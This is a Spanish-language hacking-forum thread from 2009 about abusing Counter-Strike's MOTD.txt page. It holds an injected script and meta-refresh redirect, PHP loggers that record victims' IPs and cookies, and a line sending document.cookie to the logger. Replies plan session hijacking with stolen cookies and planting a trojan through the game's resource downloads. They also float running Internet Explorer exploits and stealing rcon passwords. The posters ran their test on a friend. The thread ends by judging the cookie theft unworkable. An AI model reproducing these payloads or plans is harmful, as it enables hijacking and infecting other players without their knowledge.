Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: fede_cp en 23 Diciembre 2009, 00:45 am



Título: Counter strike MOTD.txt
Publicado por: fede_cp en 23 Diciembre 2009, 00:45 am
Bueno gente,el que alguna vez tubo un server de counter strike, sabe que el archivo MOTD.txt contiene ese especie de "portada", al iniciarse en un server.

aca el code del MOTD.txt

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  2. <title>Cstrike MOTD</title>
  3. <style type="text/css">
  4. pre {
  5. font-family:Verdana,Tahoma;
  6. color:#FFB000;
  7.     }
  8. body {
  9. background:#000000;
  10. margin-left:8px;
  11. margin-top:0px;
  12. }
  13. a {
  14.     text-decoration:    underline;
  15. }
  16. a:link  {
  17.    color:  #FFFFFF;
  18.    }
  19. a:visited   {
  20.    color:  #FFFFFF;
  21.    }
  22. a:active    {
  23.    color:  #FFFFFF;
  24.    }
  25. a:hover {
  26.    color:  #FFFFFF;
  27.    text-decoration:    underline;
  28.    }
  29. </head>
  30. <body scroll="no">
  31. <pre>
  32. You are playing Counter-Strike v1.6
  33. Visit the official CS web site @
  34. www.counter-strike.net
  35. <a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
  36. </pre>
  37. </body>
  38. </html>

Supongo que sabran que significara todo esto, o lo habran visto alguna vez.

Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  2. <title>caca</title>
  3. <script>alert("scripting")<script>
  4. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie=">
  5. <style type="text/css">
  6. pre {
  7. font-family:Verdana,Tahoma;
  8. color:#FFB000;
  9.     }
  10. body {
  11. background:#000000;
  12. margin-left:8px;
  13. margin-top:0px;
  14. }
  15. a {
  16.     text-decoration:    underline;
  17. }
  18. a:link  {
  19.    color:  #FFFFFF;
  20.    }
  21. a:visited   {
  22.    color:  #FFFFFF;
  23.    }
  24. a:active    {
  25.    color:  #FFFFFF;
  26.    }
  27. a:hover {
  28.    color:  #FFFFFF;
  29.    text-decoration:    underline;
  30.    }
  31. </head>
  32. <body scroll="no">
  33. <pre>
  34. You are playing Counter-Strike v1.6
  35. Visit the official CS web site @
  36. www.counter-strike.net
  37. <a href="http://www.counter-strike.net">Visit Counter-Strike.com</a>
  38. </pre>
  39. </body>
  40. </html>

le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.

aca web.php:

Código
  1. <html>
  2. <head>
  3. <title>Xss re pillo</html>
  4. </head>
  5. <body>
  6. <?php
  7. $ip = $_SERVER['REMOTE_ADDR'];
  8. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  9. $cookie = $_GET['cookie'];
  10. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  11. $fff = fopen("archivo.txt","a");
  12. fwrite($fff, "$scuandal \n");
  13. fclose($fff);
  14. ?>
  15. <script>window.location='http://localhost/web.php?cookie='+document.cookie;</script>
  16. </body>
  17. </html>

y  :o, observen archivo.txt

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost
  • info del server: Apache/2.2.11 (Win32) PHP/5.3.0

lo probe con un amigo y me da su info

obvio que info del server va a ser mi info jajja

bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.

nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt

si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.

PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja

saludos


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 01:12 am
pero fede, es como un bucle infinito eso, yo diria de hacer algo asi:

este seria el archivo localhost/xss-cs/index.php :
Código
  1. <?php
  2. if (isset($_GET['cookie'])){
  3. $ip = $_SERVER['REMOTE_ADDR'];
  4. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  5. $cookie = $_GET['cookie'];
  6. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  7. $fff = fopen("archivo.txt","a");
  8. fwrite($fff, "$scuandal \n");
  9. fclose($fff);
  10. }else{
  11. header("Location ?cookie=$_SERVER['HTTP_COOKIE']");
  12. }
  13. ?>

igual no creo que te de todas las cookies de todas las paginas.


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 23 Diciembre 2009, 01:23 am
igualmente si las cookies no las tiene, te da la info igual, asique no tiene que estar (isset)



saludos tomii!


Título: Re: Counter strike MOTD.txt
Publicado por: tragantras en 23 Diciembre 2009, 02:02 am
pero qué cookies espras que tenga el explorador web integrado del juego... xD


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 02:04 am
jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 23 Diciembre 2009, 02:05 am
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??

y claro, leer alguno de los archivos temp, como dice castg

habria que conseguir el code del browser

¿nadie sabe donde esta?
saludos


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 02:07 am
increiblE! lo mismo con cuanto de diferencia? menos de un minuto jajaja
jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??


saludos


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 02:12 am
ah nono, disculpen mi terrible ignorancia, como no me di cuenta antes, que tanto bondi con get y eso, mas simple:

Código
  1. <?php
  2. $ip = $_SERVER['REMOTE_ADDR'];
  3. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  4. $cookie = $_SERVER['HTTP_COOKIE'];
  5. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  6. $fff = fopen("archivo.txt","a");
  7. fwrite($fff, "$scuandal \n");
  8. fclose($fff);
  9. ?>

ahi no hay drama con nada, si la cookie es grande, si es chica, si es corta, si no lo puso en get si anda. listo. mucho mas facil.


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 23 Diciembre 2009, 02:29 am
Es lo que probe recien tom, pero no funca, alguien que este mas en el temaaa


saludos


PD:alguna idea buena


Título: Re: Counter strike MOTD.txt
Publicado por: WHK en 23 Diciembre 2009, 07:26 am
De hecho estoy 99% seguro que utilizan ieframe.dll de internet explorer, de hecho también estoy casi seguro de que si interpreta tu redirección entonces también debería interpretar código javascript xD pero no estoy seguro.

No se para que necesitas saber la ip si se supone que el servidor es tuyo y en la consola aparecen las ips conectadas xD pero igual es entrete ver todo eso, hay muchos servidores por ahi con ese contenido modificado para hacerse spam y cosas así.

Esto no es una vuln, es una feature como diría sdc xDDDD


Título: Re: Counter strike MOTD.txt
Publicado por: tragantras en 23 Diciembre 2009, 10:58 am
lo que si hubo hace tiempo fue un robo masivo de cuentas por robo de cookies o algo así... kizá consiguieron crackearlas...

por cierto en el counter strike source, estuve investigando ese tema hace tiempo y el explorador que trae si comportía cookies con el iexplore... Lo máximo que se me ocurre es robarle la cookie de inicio de sesion al steamcommunity que se loguea automático... pero esk te sirve de poco si no consigues la password crackeada.


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 13:36 pm
claro, bug o vulnerabilidad seguro que no. porq el pibe entra, sin saberlo, pero elentra. ahora el tema es como sacarlas cookies PERO TODAS. en el caso de que se use esadll, hay posibilidad de conseguir las cookies de firefox??


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 23 Diciembre 2009, 15:41 pm
o directamente, ejecutar un exploit para IE porque lo mas propbable es que use una dll de un IE mas viejo, o usa directamente el que esta instalado en cada pc?,en linux como haria?, a ver que pasa, WHK, lo de la IP fue una prueba, nada para hacer maldades.

entonces crees que no se podria sacar provecho de esto?


saludos


Título: Re: Counter strike MOTD.txt
Publicado por: WHK en 23 Diciembre 2009, 19:53 pm
Desde internet explorer no tienes acceso a las cookies de firefox y tampoco necesitas crackear ningúna contraseña si tienes la cookie de sesión del jugador ya que haces un script donde diga que si tu ip corresponde a x.x.x.x entonces te hará document.cookie = ''; donde el valor es el valor de la cookie del otro jugador y pasarás a tener su sesión y podrás hacer las modificaciones que quieras como si estubieras logueado.

Ahora, no se para que se utilizará esa sesión porque lo único que hacía en el counter era entrar, jugar, salir y nada mas xD


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 23 Diciembre 2009, 20:13 pm
claro. eso es lo que queremos hacer. conseguir todas sus cookies para "logearnos" pero no las de el cs si es que tiene cookies sino las de todo! jaja. creo que no se puede, mas siendo el internet esplorer el explorador usado. hoy en dia la mayoria usan el firefox, gracias a dios jejej. bueno gracias a todos, ya vamos a ver como filtrar un archivo cuando entras, vieron que siempre te descarga los sonidos del amx como HEADSHOT y esas cosas, y el mapa tambien descarga. quiero que AUTO-descarge un archivo-troyano. bueno. un saludo.


Título: Re: Counter strike MOTD.txt
Publicado por: WHK en 24 Diciembre 2009, 17:22 pm
ah no se puede entonces porque solamente puedes obtener las cookies de la url actual donde se encuentra la página y desde el servidor no puedes dar dos urls ya que es el cliente el que hace la navegación y no tendrías mas acceso que eso. Tampoco podrás obtener las cookies de firefox desde internet explorer.
Lo único que puedes hacer es hacer que alguien abra algún xss dentro de alguna web para obtener la cookie de ese sitio solamente pero no puedes obtenerlas todas y el sitio web tendría que ser vulnerable.


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 24 Diciembre 2009, 17:40 pm
claro, ya que estamos WHK, queria hacerte una pregunta, vos decias que seguramente el counter strike usa la dll del internet explorer, entonces el counter strike para linux es otra version no, pero si usa la dll del IE, usara una dll que se integra en la instalacion o directamente la que se tiene ya instalado en windows, porque si instala un dll de IE, podria ser una version mas vieja, y por ende explotable.


saludos!


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 24 Diciembre 2009, 17:53 pm
AH! TALVEZ USA EL PREDETERMINADO! eso hay que verlo en un linux....


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 24 Diciembre 2009, 19:32 pm
WHK dije :¬¬ jajajjaa


saludos


Título: Re: Counter strike MOTD.txt
Publicado por: tragantras en 25 Diciembre 2009, 16:31 pm
vamos a ver... por partes (si, se k dijiste whk yo tambien se leer xD )


el css NO SE PUEDE USAR NATIVAMENTE EN LINUX! xD es un juego para windows, la manera en que se puede correr es mediante wine o sucedáneos, es decir... que el juego traerá integrada una dll para realizar la conexión a internet, no creo que confien en que el usuario tenga el iexplore instalado ( en windows se puede desinstalar tambien... )


como vás a robar las cookies de todas las webs jaja
cuando yo dije lo de crackear la cookie, m referia a que teniendo la cookie realmente no puedes hacer casi nada, pq no pueds cambiar la password que es lo unico que te interesa ( el poder acceder a la account de steam)... pero seguramente no esté relacionada la cookie con la pwd...


Título: Re: Counter strike MOTD.txt
Publicado por: WHK en 25 Diciembre 2009, 18:02 pm
asi es, que yo sepa no hay ninguna versión del counter para linux, lo que haces es correrlo con wine y dentro de las dependencias de windows incluye esa librería.


Título: Re: Counter strike MOTD.txt
Publicado por: Castg! en 25 Diciembre 2009, 20:13 pm
ah listo, pero como hay un amx mod para linux yo tambien habia pensado en eso, bueno, gracias atodos por su colaboracion. no es posible robar cokies por el motd, pero si infiltrar achivos cuando carga los recursos  :rolleyes: pero eso lo dejamos para otroo posdt. un gran saludo! TEMA CERRADO!


Título: Re: Counter strike MOTD.txt
Publicado por: fede_cp en 26 Diciembre 2009, 00:38 am
buen comprobado, no sirve de nada sacar las cookies ya que no tienen relacion y tampoco hay cookies, jajaja


saludos gente!

PD:disculpen que se haya armado tremendo post


Título: Re: Counter strike MOTD.txt
Publicado por: s E t H en 26 Diciembre 2009, 06:04 am
Saquen la version del navegador que usa con js o el user-agent, asi pueden ver si usa el ie que está instalado u otro. Después se podria usar algun exploit para ie que permita ejecutar codigo y ahi le robas las cookies, lo troyanizas, robas la clave de rcon o lo que quieras... si alguien lo hace, postee los resultados